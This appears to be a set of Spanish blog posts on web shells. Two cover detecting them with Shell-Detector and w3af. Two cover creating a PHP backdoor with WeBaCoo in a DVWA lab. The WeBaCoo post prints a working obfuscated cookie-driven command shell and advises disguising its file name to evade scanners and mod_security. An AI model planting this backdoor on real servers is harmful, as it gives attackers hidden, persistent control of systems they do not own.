Web Shell Detector

El día de hoy les quiero comentar de una interesante herramienta que utilizo para buscar los "Web Shells" dentro de un directorio Web donde los malos siempre se quieren colar.

Y para ello vamos a utilizar una herramienta llamada Web Shell Detector donde viene en las versiones escrita en el lenguaje de PHP y Python.

A fines prácticos, realmente me gusta mucho utilizarlo como scripts en Python. Para poder descargarlo solo tenemos que clonar el repositorio desde GitHub de la siguiente manera:

$ git clone https://github.com/emposha/Shell-Detector.git

Solo queda ingresar al directorio y ejecutar la herramienta shelldetector.py especificando como argumento -d el directorio que queremos revisar.

$ python shelldetector.py -d /var/www/miweb

Shell Detector va a investigar y analizar cada archivo dentro de ese directorio web en búsqueda de funciones que generalmente los malos utilizan para ocultar y ofuscar scripts como base64_encode, system, exec, etc. y por medio de su firma, expresiones regulares y contenido puede llegar a determinar si se trata de un Web Shell instalado en el servidor.

Recordemos que los Web Shell más populares encontrados en las webs coladas son c99, r57, c100, PHPjackal y Locus, pero claro no son los únicos.

A poner en práctica esta herramienta y monitorear nuestros servidores web con esta herramienta tan simple de implementar.

Saludos!

Enlace | Web Shell Detector

Como buscar backdoors con w3af

La idea de hoy es entender y utilizar w3af como herramienta para buscar en un sitio web un backdoors, en muchos casos también se conoce como webshell y que generalmente un atacante instala para luego seguir ingresando al servidor comprometido.

Para comenzar a auditar cualquier web, debemos iniciar w3af de la siguiente manera

$ ./w3af_console

Una vez allí, escogemos un perfil para comenzar a escanear, para el ejemplo vamos a usar empty_profile

w3af>>> profiles use empty_profile

Ahora necesitamos activar uno de los plugins con los que cuenta w3af, dentro de la categoría de crawl llamado find_backdoors, el mismo posee una pequela wordlist con los nombres de los backdoors más populares como c99, r57, cmd, etc.

w3af>>> plugins crawl find_backdoors

Ahora nos queda setear la dirección web a la cuál se va a realizar las pruebas y búsqueda de backdoors

w3af>>> target set target http://misitioweb.com

Finalmente iniciamos el scanner y solo nos queda esperar los resultados del test. W3af lo que va a hacer es probar estos nombres de archivo anidada a la dirección web ingresada esperando un requests 200 con la cuál va a confirmar la existencia de un backdoor.

w3af>>> start

Saludos!

Como crear un Backdoor con WeBaCoo (2 de 2)

Segunda y última parte de esta entrega, y la idea de hoy es en primer lugar crear nuestro backdoor con WeBaCoo y lograr comprometer un servidor, para evitar meternos en problemas vamos a utilizar DVWA y en particular su fallo en el menu de Upload.

Para evitar llamar la atención en los escaneadores de archivos e incluso en el mismo mod_security, les recomiendo que utilicen un nombre para su backdoor que no haga alusión a que es un backdoor sino un archivo más.

$ ./webacoo.pl -g -f 1 -o consulta.php

        WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
        Copyright (C) 2011-2012 Anestis Bechtsoudis
        { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Backdoor file "consulta.php" created.

Por defecto el código queda ofuscado, pero tenemos la opción con -r de no ofuscarlo al momento de generarlo.

$ cat consulta.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

Como crear un Backdoor con WeBaCoo (1 de 2)

La idea de estos artículos es entender algunos conceptos y rápidamente ponerlos en práctica, haciendo uso de algunas herramientas para plantar nuestra bandera en las auditorios y pentesting que realicemos, en otras palabras es una buena forma de consolidar nuestro acceso y tomar control del servidor.

Antes les propongo conocer un poco más sobre los Backdoors, Wikipedia nos propone el siguiente concepto:

"En la informática, una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta."

Ahora bien, conociendo este concepto y dada una cantidad de factores a nuestro favor, nosotros podríamos llegar a crear un backdoor para tener acceso en todo momento.

UN DATO CURIOSO

En el 90% de los defacement en sitios webs, sus atacantes dejan una puerta trasera creadas con algún scripts PHP Shell como c99Shell, r57shell o alguno similar, detectable por algun analizador de Log en el Servidor Web y subida al servidor por algún fallo en los permisos de un directorio, Remot File Include o una mala administración de las cuentas de usuarios administradores del sitio.

Desde hace tiempo, utilizo una herramienta para crear Backdoor en PHP llamada WeBaCoo.